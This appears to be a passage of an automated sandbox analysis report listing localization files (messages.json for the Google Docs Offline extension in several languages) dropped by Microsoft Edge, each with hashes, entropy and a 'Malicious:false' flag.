                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
